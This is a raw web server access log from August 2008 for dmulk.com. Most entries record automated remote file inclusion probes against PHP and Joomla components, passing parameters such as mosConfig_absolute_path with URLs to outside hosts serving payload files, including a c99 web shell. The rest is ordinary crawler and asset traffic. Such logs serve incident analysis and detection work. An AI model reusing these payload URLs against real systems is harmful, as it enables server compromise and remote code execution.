87.106.191.136 - - [07/Aug/2008:11:01:17 -0700] "GET //OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:18 -0700] "GET /logs//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:22 -0700] "GET /logs/access_080213.log//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:23 -0700] "GET //OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:23 -0700] "GET /logs//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:01:43 -0700] "GET /logs/access_080127.log%20//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:02:07 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:02:08 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:02:08 -0700] "GET /phphtml.php?htmlclass_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:02:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:02:20 -0700] "GET /logs/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59568 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:02:23 -0700] "GET /?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:46 -0700] "GET /logs/access_080103.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:46 -0700] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:46 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:46 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:47 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:47 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:49 -0700] "GET /logs/access_080103.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:49 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:49 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:51 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:53 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:02:53 -0700] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:03:00 -0700] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:03:00 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:03:00 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:11:03:04 -0700] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:03:08 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:03:08 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:03:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:03:09 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:03:13 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:03:13 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:03:47 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:03:51 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:03:51 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:03:51 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:11:04:27 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:11:04:27 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:11:04:35 -0700] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
166.70.44.131 - - [07/Aug/2008:11:05:27 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:05:28 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:05:29 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.56.56.190 - - [07/Aug/2008:11:05:54 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:05:59 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:06:03 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [07/Aug/2008:11:06:39 -0700] "GET /logs/!rfihttp://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [07/Aug/2008:11:06:39 -0700] "GET /!rfihttp://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [07/Aug/2008:11:06:39 -0700] "GET /logs/access.log/!rfihttp://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:07:01 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:07:04 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:07:05 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:31 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:31 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:35 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 200 18517 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:35 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 200 18517 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:07:39 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:43 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 200 18397 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:43 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:44 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:11:07:44 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.132.144.66 - - [07/Aug/2008:11:07:46 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 231848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:08:07 -0700] "GET /index.php?seccion=http://soft-5.com/Picture80?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.805" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:11:08:09 -0700] "GET /logs/access.log/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:11:08:10 -0700] "GET /errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:11:08:10 -0700] "GET /logs/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:08:19 -0700] "GET /logs/access_080215.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:08:30 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:08:30 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:08:30 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:08:32 -0700] "GET /logs/access_080215.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:08:33 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:08:39 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:08:42 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:08:44 -0700] "GET /logs/access_080215.log HTTP/1.1" 200 655360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:08:49 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:09:01 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 860363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:09:02 -0700] "GET /logs/access_080215.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:09:15 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 860363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:09:20 -0700] "GET /logs/access_080215.log HTTP/1.1" 200 1121402 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
203.153.115.99 - - [07/Aug/2008:11:09:23 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:09:27 -0700] "GET /logs/access_080115.log/components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:09:27 -0700] "GET /components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:09:27 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 860363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:09:27 -0700] "GET /logs/components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:09:40 -0700] "GET /logs/access_080115.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:09:40 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:09:40 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [07/Aug/2008:11:09:41 -0700] "GET /!rfihttp://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
68.164.164.61 - - [07/Aug/2008:11:09:41 -0700] "GET /logs/access_080213.log HTTP/1.1" 200 860363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.dmulk.com"
69.93.189.130 - - [07/Aug/2008:11:09:41 -0700] "GET /logs/access.log/!rfihttp://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.189.130 - - [07/Aug/2008:11:09:41 -0700] "GET /logs/!rfihttp://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:11:09:41 -0700] "GET /logs/access_080315.log%20/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:11:09:42 -0700] "GET /logs/access_080315.log%20/errors.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:09:45 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:11:09:48 -0700] "GET /logs/access_080128.log%20/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:11:09:49 -0700] "GET /logs/access_080128.log%20/errors.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:09:59 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:10:00 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:03 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://web4cc.t35.com/c99.txt????? HTTP/1.0" 200 18495 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:05 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:05 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:05 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:05 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
70.85.201.66 - - [07/Aug/2008:11:10:06 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:11:10:06 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:07 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:07 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:10:08 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:08 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.0" 200 1014 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:09 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.0" 200 556 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:09 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.0" 200 7868 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:10:09 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.49.14.32 - - [07/Aug/2008:11:10:09 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.0" 200 42010 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0" "dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:10:09 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:10:09 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
